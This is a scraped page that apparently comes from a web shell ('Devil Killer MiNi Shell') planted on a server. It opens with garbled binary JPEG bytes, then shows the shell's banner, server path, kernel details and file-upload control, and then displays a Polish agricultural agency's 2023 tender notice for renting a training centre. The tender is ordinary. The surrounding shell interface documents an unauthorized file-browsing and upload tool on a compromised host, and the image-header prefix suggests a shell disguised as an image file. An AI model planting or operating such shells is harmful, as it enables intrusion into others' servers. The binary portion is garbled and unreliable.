JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230424/0019008501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Najem ośrodków na potrzeby szkoleń </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Agencja Restrukturyzacji i Modernizacji Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Mazowiecki Oddział Regionalny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010613083</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Jana Pawła II 70</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-175</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">225365979</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">joanna.stanek@arimr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.arimr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> agencja płatnicza </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Najem ośrodków na potrzeby szkoleń </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8a476f1a-e2d2-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00190085</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/arimr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie oświadczeń,<br/>wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się wyłącznie przy użyciu platformy zakupowej Open Nexus pod<br/>adresem: https://platformazakupowa.pl/ (dalej również jako: ,,platforma”).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>2. Zamawiający może w uzasadnionych przypadkach również komunikować się z Wykonawcami za<br/>pomocą poczty elektronicznej: joanna.stanek@arimr.gov.pl.<br/>3. Oferty oraz oświadczenie wstępne, o którym mowa w art. 125 uPzp, sporządza się, pod<br/>rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>4. Zamawiający informuje, że posiadanie konta na platformie jest dobrowolne, natomiast<br/>złożenie oferty w postępowaniu może odbywać się bez posiadania konta.<br/>5. Na stronie platformy znajduje się Instrukcja dla Wykonawców, która określa informacje dotyczące<br/>sposobu i formy złożenia oferty, sposobu komunikowania się Zamawiającego z wykonawcami<br/>(poza składaniem ofert), informacje dotyczące sposobu otwarcia ofert na platformie.<br/>6. Wymagania techniczne i organizacyjne wysyłania oraz odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>zostały opisane w Regulaminie korzystania z platformy (https://platformazakupowa.pl/strona/1-<br/>regulamin). Składając ofertę Wykonawca akceptuje Regulamin platformy dla użytkowników<br/>(wykonawców).<br/>7. W ramach platformy dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowanie<br/>dokumentu papierowego składane są przez Wykonawcę za pośrednictwem formularza „wyślij<br/>wiadomość”.<br/>8. Maksymalna wielkość wszystkich załączonych plików poprzez platformę wynosi 1GB.<br/>Dopuszczalna ilość plików - 20. Zalecana maksymalna wielkość pliku 75MB. Załączone przez<br/>platformę pliki muszą zawierać w nazwie nr postępowania w formacie:<br/>BOR07_2616_1_2023_DS.<br/>9. Za datę przekazania zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na<br/>platformę.<br/>10. Zamawiający przekazuje link do jego profilu na platformie: https://platformazakupowa.pl/pn/bppt,<br/>gdzie będzie możliwość odnalezienia niniejszego postępowania po kliknięciu w zakładkę<br/>,,Postępowania”.<br/>11. Zamawiający rekomenduje użycie przez wykonawców następujących formatów przesyłanych<br/>danych: .pdf, .doc, .docx, .rtf, .xps, .odt.<br/>12. Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz<br/>udostępnienia i przechowywania dokumentów elektronicznych (t.j. Dz. U. z 2020 r. poz. 1261;<br/>dalej: „Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor<br/>Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac<br/>Os x 10.4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa; w przypadku Internet Explorer minimalnie<br/>wersja 10.0.,4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf.<br/>6) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej RODO,<br/>informuję, że:<br/>1.1. Administratorem Pani/Pana danych osobowych (dalej: Administrator) pozyskanych w toku<br/>postępowania jest Agencja Restrukturyzacji i Modernizacji Rolnictwa z siedzibą w Warszawie,<br/>Al. Jana Pawła II 70, 00-175 Warszawa. Z Administratorem można kontaktować się poprzez<br/>e-mail: info@arimr.gov.pl lub pisemnie na adres korespondencyjny Centrali Agencji<br/>Restrukturyzacji i Modernizacji Rolnictwa: ul. Poleczki 33, 02-822 Warszawa.<br/>1.2. Administrator wyznaczył inspektora ochrony danych, z którym można kontaktować się w<br/>sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych<br/>z przetwarzaniem danych, poprzez adres e-mail: iod@arimr.gov.pl lub pisemnie na adres<br/>korespondencyjny Administratora, wskazanych w pkt 1.1.<br/>1.3. Pani/Pana dane osobowe pozyskane przez Administratora przetwarzane będą na podstawie<br/>art. 6 ust. 1 lit. c RODO w celu przeprowadzenia niniejszego postępowania o udzielenie<br/>zamówienia publicznego.<br/>1.4. Odbiorcami Pani/Pana danych osobowych mogą być:<br/>1.4.1. osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 2 ustawy,<br/>1.4.2. organy kontrolne,<br/>1.4.3. osoby lub podmioty, którym Administrator udzieli informacji publicznej zgodnie z ustawą<br/>z dnia 6 września 2001 r. o dostępie do informacji publicznej (Dz.U. z 2020 poz. 2176<br/>t.j.),<br/>1.4.4. podmioty uprawnione do przetwarzania danych osobowych na podstawie przepisów<br/>powszechnie obowiązującego prawa.<br/>1.5. Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do przeprowadzenia<br/>niniejszego postępowania. Ponadto, zgodnie z art. 78 ust. 1 ustawy przechowywane będą<br/>przez okres 4 lat od dnia zakończenia niniejszego postępowania. Okres przechowywania<br/>danych może zostać każdorazowo przedłużony o okres przedawnienia roszczeń, jeżeli<br/>przetwarzanie danych będzie niezbędne do dochodzenia roszczeń lub do obrony przed takimi<br/>roszczeniami przez Administratora. Ponadto, okres przechowywania danych może zostać<br/>przedłużony na okres 5 lat, na potrzeby archiwizacji.<br/>1.6. Przysługuje Pani/Panu prawo do dostępu do Pani/Pana danych osobowych, ich sprostowania<br/>oraz prawo żądania ograniczenia przetwarzania Pani/Pana danych osobowych.<br/>1.7. W przypadku uznania, że przetwarzanie danych osobowych narusza przepisy RODO,<br/>przysługuje Pani/Panu prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych.<br/>1.8. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego, a konsekwencje<br/>niepodania określonych danych wynikają z ustawy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX uPzp, do upływu terminu do ich<br/>wniesienia.<br/>W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy<br/>lub daty postępowania o udzielenie zamówienia publicznego.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego.<br/>Zamawiający przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia<br/>publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>Do przetwarzania danych osobowych, o których mowa w art. 10 RODO, mogą być dopuszczone<br/>wyłącznie osoby posiadające pisemne upoważnienie. Osoby dopuszczone do przetwarzania takich<br/>danych są obowiązane do zachowania ich w poufności.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień<br/>Publicznych, prawa, o których mowa w art. 15 i art. 16 RODO, są wykonywane w drodze żądania<br/>skierowanego do zamawiającego.<br/>Zasada jawności, o której mowa w art. 18 i 74 ust. 1 uPzp, ma zastosowanie do wszystkich danych<br/>osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO, zebranych w toku<br/>postępowania o udzielenie zamówienia publicznego. Ograniczenia zasady jawności, o których mowa<br/>w art. 18 ust. 2-5 uPzp, stosuje się odpowiednio.<br/>Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o<br/>którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie przetwarzania danych osobowych<br/>zawartych w protokole i załącznikach do protokołu, zamawiający nie udostępnia tych danych<br/>zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o których mowa<br/>w art. 18 ust. 2 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOR07.2616.1.2023.DS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług hotelarsko – restauracyjnych wraz z obsługą narad,<br/>szkoleń lub spotkań” oraz pobytem pracowników MzOR ARiMR w ośrodku szkoleniowym, realizowany<br/>poprzez sukcesywny wynajem ośrodka położonego w odległości nie większej niż 70 km od siedziby<br/>Zamawiającego, tj. Warszawa, al. Jana Pawła II 70 z wyłączeniem ośrodków położonych w granicach<br/>administracyjnych Warszawy.<br/>2. Opis przedmiotu zamówienia stanowi załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <p class="mb-0">55511000-5 - Usługi bufetowe oraz usługi kawiarniane dla ograniczonej grupy klientów</p> <p class="mb-0">60140000-1 - Nieregularny transport osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki anulowania rezerwacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa:<br/>Zamawiający w ramach przedmiotowego warunku udziału w postępowaniu wymaga wykazania przez wykonawcę, że dysponuje on ośrodkiem (obiektem hotelowym), w których będzie realizowany przedmiot zamówienia, spełniającym następujące wymogi:<br/>1) znajduje się w odległości nie większej niż 70 km od siedziby Zamawiającego, tj.<br/>Warszawa, al. Jana Pawła II 70 z wyłączeniem ośrodków położonych w granicach<br/>administracyjnych Warszawy;<br/>2) posiada miejsca noclegowe: co najmniej 130 (co najmniej 10 pokoi 1-osobowych oraz co<br/>najmniej 60 pokoi 2-osobowych);<br/>3) posiada sale szkoleniowe: co najmniej 1 sala na 130 osób oraz 2 sale na 50 osób;<br/>4) posiada infrastrukturę do zapewnienia całodziennego wyżywienia dla uczestników<br/>narad, szkoleń lub spotkań;<br/>5) posiada standard na poziomie nie mniejszym niż 3 gwiazdki lub równoważnym<br/>(spełniającym wymagania hotelu trzygwiazdkowego);<br/>6) jest położony w odległości nie mniejszej niż 400 m od drogi krajowej lub drogi wojewódzkiej. <br/><br/>Zamawiający będzie weryfikował wyżej wskazaną odległość ośrodka od siedziby Zamawiającego wskazaną w pkt. 1 na podstawie danych ze strony internetowej google maps (https://www.google.pl/maps) w oparciu o trasę przebiegającą przez dostępne, utwardzone drogi publiczne z uwzględnieniem ewentualnych dróg wewnętrznych będących w dyspozycji wykonawcy. Odległość wskazana w pkt. 6 również będzie badana przez Zamawiającego na podstawie danych ze strony internetowej google maps (https://www.google.pl/maps) w oparciu o linię prostą dzielącą obiekt hotelowy od drogi krajowej lub wojewódzkiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, według wzoru stanowiącego załącznik nr 5 do SWZ,<br/>b) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 uPzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>- art. 108 ust. 1 pkt. 1 i 2 uPzp,<br/>- art. 108 ust. 1 pkt 3 uPzp,<br/>- art. 108 ust. 1 pkt 4 uPzp, dotyczących orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 uPzp, dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 uPzp,<br/>- art. 109 ust. 1 pkt 6 uPzp,<br/>- art. 109 ust. 1 pkt 8 uPzp,<br/>- art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U.2022.835), złożonego według wzoru, stanowiącego załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na potwierdzenie spełniania warunku udziału w postępowaniu w postaci zdolności technicznej lub zawodowej Zamawiający wymaga:<br/>złożenia oświadczenia (zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ) o dysponowaniu przez wykonawcę ośrodkiem (obiektem hotelowym), w których będzie realizowany przedmiot zamówienia, który spełnia następujące wymogi:<br/>1) znajduje się w odległości nie większej niż 70 km od siedziby Zamawiającego, tj. Warszawa, al. Jana Pawła II 70 z wyłączeniem ośrodków położonych w granicach administracyjnych Warszawy;<br/>2) posiada miejsca noclegowe: co najmniej 110 pokoi jedno i dwuosobowych;<br/>3) posiada sale szkoleniowe: co najmniej 1 sala na 120 osób oraz 2 sale na 50 osób;<br/>4) posiada infrastrukturę do zapewnienia całodziennego wyżywienia dla uczestników narad, szkoleń lub spotkań;<br/>5) posiada standard na poziomie nie mniejszym niż 3 gwiazdki lub równoważnym (spełniającym wymagania hotelu trzygwiazdkowego),<br/>6) jest położony w odległości nie mniejszej niż 400 m od drogi krajowej lub drogi wojewódzkiej, zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ.</span> </h3> 